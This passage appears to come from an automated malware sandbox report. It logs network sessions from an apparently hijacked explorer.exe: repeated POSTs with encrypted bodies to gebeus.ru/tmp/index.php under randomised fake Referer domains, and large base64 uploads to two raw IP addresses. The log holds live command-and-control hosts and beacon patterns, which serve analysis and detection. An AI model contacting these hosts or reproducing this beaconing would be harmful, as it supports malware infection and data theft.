                                                          Jul 19, 2024 13:45:40.952775955 CEST362OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 08 e3 87
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuKnOSM.(E*y8TB|N./WB#B#K,mRnH%gePo:7Ndx]l8hZG'=.
                                                          Jul 19, 2024 13:45:42.027148008 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:41 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.557842186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:46.319787025 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tcaoqcerkkqpxcv.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 153
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:46.319884062 CEST153OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 17 fa 80
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vu<rGT|cv3EhL`WnWI`7BW+NVBLgM
                                                          Jul 19, 2024 13:45:47.356575012 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:47 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.557846186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:51.796817064 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://cgqjakxfbvjd.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 226
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:51.796844959 CEST226OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 19 c2 8d
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuRs9yPt?_Uu)b04jRxV[9c?D0'S;!b.bG~Thb~]u<]+}<{tCP7
                                                          Jul 19, 2024 13:45:52.844153881 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:52 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.557850186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:57.447366953 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://acdyanixqocc.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 337
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:57.447391987 CEST337OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 05 e8 e2
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuv}Gjfm?T w,H>nKkNI>~MYP'x/*Wm%5h1!fw!^4%r64lb(x%+}
                                                          Jul 19, 2024 13:45:58.525445938 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:58 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.55785458.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:03.470933914 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://sphopwrqrdvrdc.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 124
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:03.470968008 CEST124OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 5a ba 98
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vu[Z4a\S=wym`[xo
                                                          Jul 19, 2024 13:46:05.047127008 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:04 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.55785858.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:10.076527119 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://rbvhstcjoya.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 122
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:10.076693058 CEST122OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 4a ec 97
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuqJyrKJveF_+r
                                                          Jul 19, 2024 13:46:11.623915911 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:11 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.55786258.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:15.926318884 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gverqeqrcdjfj.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 141
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:15.926337004 CEST141OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 22 e9 8f
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuw"-GwN ~,4.1;U@,@C80VP
                                                          Jul 19, 2024 13:46:17.426889896 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:17 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.55786658.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:21.846045017 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://wewwkflbpaqtq.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 150
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:21.846074104 CEST150OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 1e ec be
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vu'U\V5EF3N="YjV07K#U@ fPv
                                                          Jul 19, 2024 13:46:23.373307943 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:23 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.55787058.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:27.956110954 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tdqulnerhstaff.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 288
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:27.956144094 CEST288OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 38 fa b5
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vu-8^1wP]Igl5ayjt>KW,:IQ.Aj[(cF_DDDqtM'(bBxu{XNA~cq2j
                                                          Jul 19, 2024 13:46:29.488008976 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:29 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.55787458.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:34.080713034 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ddcrjixvnjlweis.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 149
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:34.080751896 CEST149OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 1e cb bc
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuMrqnofn%S"-Rv5B@L!bM$u|XX
                                                          Jul 19, 2024 13:46:35.583283901 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:35 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.55787858.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:40.522799969 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gdughyktsbt.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 152
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:40.522835970 CEST152OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 5a dd bf
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vucZ]DY`Na`a@N|,XO[3><>V9eT8@qs+
                                                          Jul 19, 2024 13:46:42.008372068 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:41 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.55788258.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:46.519750118 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://psbkmfijtgxs.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 225
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:46.519779921 CEST225OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 28 db bb
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuK(S\gJ8F+Q/5H4ZFr%16-&F/g`NS0pj?TEH65jH9D@Z39tX%D
                                                          Jul 19, 2024 13:46:47.992907047 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:47 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.55788658.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:52.109697104 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ycxtgfaggjcyqor.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 331
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:52.109745979 CEST331OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6c 0e e9 fb
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vulLUJb~ o~g^^:wQ ^B!578Cx("Ao^"+\{@*%;E'9pF!V/]tA^
                                                          Jul 19, 2024 13:46:53.633193016 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:53 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.55789058.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:46:57.594506025 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ogexqdmlxvkrb.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 354
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:46:57.594530106 CEST354OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 20 cc fe
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vu8 IGfFum0<"dKo=DME|RZ]x7@1|r9 O{tlN,-&2|rx^ZjT4`
                                                          Jul 19, 2024 13:46:59.108042955 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:46:58 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.55789458.151.148.90801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:47:03.344377041 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gfjdcfmhxmbvhdj.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 362
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:47:03.344409943 CEST362OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 30 b2 f5
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vua0TdvbLnZOm~AIb*~ZY+LD5[ho6Z-`~L9";JL5jH}RJu[-5Bvh,w|(r*s
                                                          Jul 19, 2024 13:47:04.870244026 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:47:04 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.557793167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:19 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 7591
                                                          2024-07-19 11:44:19 UTC7591OUTData Raw: 47 39 73 43 77 50 34 63 72 50 59 44 57 4a 55 73 4a 4a 5a 45 41 62 59 66 64 38 4f 48 50 4e 76 33 5a 75 4d 6f 38 47 79 48 53 73 6e 59 43 63 6a 33 58 62 52 34 7a 43 75 45 73 64 42 56 5a 4f 53 31 6f 4f 77 35 68 31 47 77 4d 61 54 68 59 36 63 34 4c 4b 38 34 61 70 74 73 44 79 34 49 39 2f 63 4e 37 41 59 55 37 4c 55 50 56 41 59 71 59 41 61 73 54 54 4d 44 65 50 33 48 78 66 67 46 76 78 49 74 6d 77 74 33 76 5a 38 59 74 48 55 41 6d 6b 6d 34 69 77 5a 2b 4b 75 42 57 34 57 58 69 6f 62 74 4b 52 37 39 2b 34 69 52 36 2f 46 66 39 65 63 2f 47 72 62 4e 55 4b 58 2f 38 78 63 62 63 59 51 39 70 76 4f 49 5a 79 54 4f 4a 59 46 4f 63 46 44 30 39 73 54 42 52 65 75 41 32 54 5a 58 64 41 4e 41 69 51 42 39 7a 69 65 61 70 31 30 44 36 78 2b 43 33 63 4f 6a 43 6f 65 51 33 45 36 70 55 54 4e 63
                                                          Data Ascii: G9sCwP4crPYDWJUsJJZEAbYfd8OHPNv3ZuMo8GyHSsnYCcj3XbR4zCuEsdBVZOS1oOw5h1GwMaThY6c4LK84aptsDy4I9/cN7AYU7LUPVAYqYAasTTMDeP3HxfgFvxItmwt3vZ8YtHUAmkm4iwZ+KuBW4WXiobtKR79+4iR6/Ff9ec/GrbNUKX/8xcbcYQ9pvOIZyTOJYFOcFD09sTBReuA2TZXdANAiQB9zieap10D6x+C3cOjCoeQ3E6pUTNc
                                                          2024-07-19 11:44:20 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 729
                                                          Date: Fri, 19 Jul 2024 11:44:20 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:20 UTC729INData Raw: 72 58 48 6d 32 2b 5a 46 58 68 7a 64 72 59 4e 4b 47 7a 7a 75 6d 7a 2f 45 51 50 4f 68 30 43 68 4f 56 39 58 6d 70 78 72 44 5a 68 77 2f 44 43 61 47 35 39 47 63 55 72 65 39 7a 32 4e 38 78 7a 71 4d 32 7a 2b 77 45 68 56 66 46 72 72 44 69 4a 49 2f 32 37 75 39 75 70 55 37 67 5a 67 52 4a 42 59 70 53 66 64 6c 51 67 6a 63 4a 37 6b 45 61 7a 6d 58 50 30 42 68 2b 65 73 34 44 6b 49 5a 43 5a 7a 38 44 68 33 4b 30 73 49 41 4b 37 73 36 59 53 41 30 6d 58 63 50 77 35 4d 70 33 48 56 4b 4a 6d 35 31 4a 6a 49 59 47 54 37 69 2b 4e 75 62 72 35 41 4c 39 37 66 6f 31 49 6e 45 52 6c 69 39 4d 47 63 38 52 68 6b 59 33 76 54 68 58 36 6f 32 67 35 41 55 63 56 73 65 2f 58 57 50 6b 31 58 7a 45 6f 61 4b 37 44 59 59 55 53 4c 4a 34 6d 75 50 48 48 57 4f 49 32 37 76 69 46 61 46 30 4b 61 4d 71 6c 46
                                                          Data Ascii: rXHm2+ZFXhzdrYNKGzzumz/EQPOh0ChOV9XmpxrDZhw/DCaG59GcUre9z2N8xzqM2z+wEhVfFrrDiJI/27u9upU7gZgRJBYpSfdlQgjcJ7kEazmXP0Bh+es4DkIZCZz8Dh3K0sIAK7s6YSA0mXcPw5Mp3HVKJm51JjIYGT7i+Nubr5AL97fo1InERli9MGc8RhkY3vThX6o2g5AUcVse/XWPk1XzEoaK7DYYUSLJ4muPHHWOI27viFaF0KaMqlF


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.557794107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:21 UTC236OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 156303
                                                          2024-07-19 11:44:21 UTC16148OUTData Raw: 55 56 6d 46 6a 61 4d 4e 34 58 79 57 73 66 49 63 2f 6c 70 4d 68 59 50 4f 4b 62 51 35 6d 38 78 63 4d 41 34 69 69 78 41 57 4c 65 74 74 35 35 62 4d 51 4c 58 4a 42 45 31 77 70 49 37 71 67 4c 7a 72 51 5a 4e 52 5a 32 41 65 33 44 37 41 53 63 7a 44 61 6a 72 39 4e 6f 4d 62 65 70 35 6c 36 45 42 6d 76 6b 7a 77 57 72 57 47 4a 49 4e 56 4c 66 45 72 41 2f 6f 36 72 58 59 6c 73 2b 33 56 5a 63 61 6b 7a 2f 35 42 4e 41 6f 33 6d 45 2f 4f 2f 77 58 57 45 32 4e 6f 54 44 34 74 55 36 6a 4d 69 48 46 46 34 75 53 74 4b 6a 78 61 42 6f 32 53 57 50 47 58 4a 35 75 55 72 77 54 71 55 30 50 70 36 37 79 64 53 53 58 59 4e 33 47 4a 78 6e 6e 64 43 52 69 7a 67 68 36 37 69 77 53 41 51 32 53 2f 2f 74 32 56 7a 61 4c 32 6e 35 50 44 38 58 43 78 31 58 6a 51 77 70 69 77 45 43 79 4e 55 46 67 72 62 53 42
                                                          Data Ascii: UVmFjaMN4XyWsfIc/lpMhYPOKbQ5m8xcMA4iixAWLett55bMQLXJBE1wpI7qgLzrQZNRZ2Ae3D7ASczDajr9NoMbep5l6EBmvkzwWrWGJINVLfErA/o6rXYls+3VZcakz/5BNAo3mE/O/wXWE2NoTD4tU6jMiHFF4uStKjxaBo2SWPGXJ5uUrwTqU0Pp67ydSSXYN3GJxnndCRizgh67iwSAQ2S//t2VzaL2n5PD8XCx1XjQwpiwECyNUFgrbSB
